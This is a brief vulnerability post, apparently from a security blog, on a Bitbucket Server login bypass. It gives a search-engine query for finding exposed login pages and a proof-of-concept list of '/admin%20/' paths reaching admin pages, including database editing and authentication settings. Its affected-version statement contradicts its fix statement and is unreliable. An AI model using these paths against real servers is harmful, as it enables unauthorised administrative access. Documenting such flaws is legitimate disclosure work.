Post

Bitbucket Login Bypass Vulnerability

Bitbucket Login Bypass Vulnerability

Bitbucket Login bypass vulnerability

Vulnerability Description

This error has been fixed and deployed on Bitbucket Server > 4.8.

Vulnerability Impact

Bitbucket Server > 4.8

Network surveying and mapping

title=”Log in - Bitbucket”

Vulnerability reappears

Login page

img

Verify POC

1
2
3
4
5
6
7
8
/admin%20/mail-server
/admin%20/db
/admin%20/db/edit
/admin%20/license
/admin%20/logging
/admin%20/server-settings
/admin%20/authentication
/admin%20/avatars

img

This post is licensed under CC BY 4.0 by the author.